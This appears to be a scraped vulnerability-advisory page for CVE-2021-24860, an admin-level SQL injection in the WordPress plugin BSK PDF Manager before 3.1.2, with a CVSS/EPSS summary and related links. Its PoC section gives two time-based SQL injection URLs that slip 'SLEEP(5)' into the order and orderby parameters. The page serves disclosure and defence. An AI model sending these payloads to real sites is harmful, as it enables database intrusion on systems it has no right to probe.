Lucene search
JrXnmWPVDB-ID:D5891973-37D0-48CB-A5A3-A26C771B3369HistoryNov 01, 2021 - 12:00 a.m.
BSK PDF Manager < 3.1.2 - Admin+ SQL Injection
2021-11-0100:00:00
JrXnm
wpscan.com
7
0.001 Low
EPSS
Percentile
37.7%
The plugin does not validate and escape the orderby and order parameters before using them in a SQL statement, leading to a SQL injection issue
PoC
With at least one BSK PDF Category: https://example.com/wp-admin/admin.php?page=bsk-pdf-manager&order;=and+sleep(5) https://example.com/wp-admin/admin.php?page=bsk-pdf-manager&orderby;=last_date`+AND+SLEEP(5)+OR+`last_date
| CPE | Name | Operator | Version |
|---|---|---|---|
| bsk-pdf-manager | lt | 3.1.2 |
Related
prion
prion
Sql injection
2021-11-29 09:15:00
cvelist
cvelist
CVE-2021-24860 BSK PDF Manager < 3.1.2 - Admin+ SQL Injection
2021-11-29 08:25:41
wpexploit
wpexploit
BSK PDF Manager < 3.1.2 - Admin+ SQL Injection
2021-11-01 00:00:00
nvd
nvd
CVE-2021-24860
2021-11-29 09:15:07
cve
cve
CVE-2021-24860
2021-11-29 09:15:07